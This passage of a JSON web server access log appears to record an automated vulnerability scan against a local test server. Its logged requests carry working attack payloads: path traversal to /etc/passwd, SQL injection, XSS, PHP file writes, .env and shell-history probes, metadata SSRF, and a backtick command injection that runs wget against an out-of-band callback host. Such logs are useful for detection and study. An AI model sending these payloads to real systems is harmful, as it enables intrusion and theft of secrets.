Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22\x22:1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-----------------------------253855577425106594691130420583\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22../../../../../tmp/passwd9\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0AMyPasswdNewData->/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /OA_HTML/lcmServiceController.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://ca285tosmpvbafqg07h01n4z3oegttapu.oast.fun`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%2229KAY0jq8BXKj6L2i0vHciRTIMH%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.146","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/29KAXwLLmSeDFPLPeRHjvzApwVo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 